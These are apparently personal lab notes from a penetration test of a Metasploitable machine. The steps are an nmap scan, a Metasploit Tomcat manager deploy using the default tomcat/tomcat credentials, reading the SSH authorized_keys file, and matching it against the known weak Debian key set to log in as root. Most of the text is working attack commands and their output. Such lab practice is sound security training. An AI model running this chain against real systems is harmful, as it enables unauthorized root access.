db_nmap -sV 10.10.15.3

exploit/multi/http/tomcat_mgr_deploy

password tomcat
username tomcat
RHOST 10.10.15.4
LPORT 9999
RPORT 8180

whoami

ls -la .ssh

cat .ssh/authorized_keys

https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/5622.tar.bz2

elisa@kali:~/Desktop/rsa/2048$ grep -lr AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0i (...)
57c3115d77c56390332dc5c49978627a-5429.pub

elisa@kali:~/Desktop/rsa/2048$ ssh -i 57c3115d77c56390332dc5c49978627a-5429 root@10.10.15.4

root@metasploitable:~# whoami
root
root@metasploitable:~# id
uid=0(root) gid=0(root)) groups=0(root)


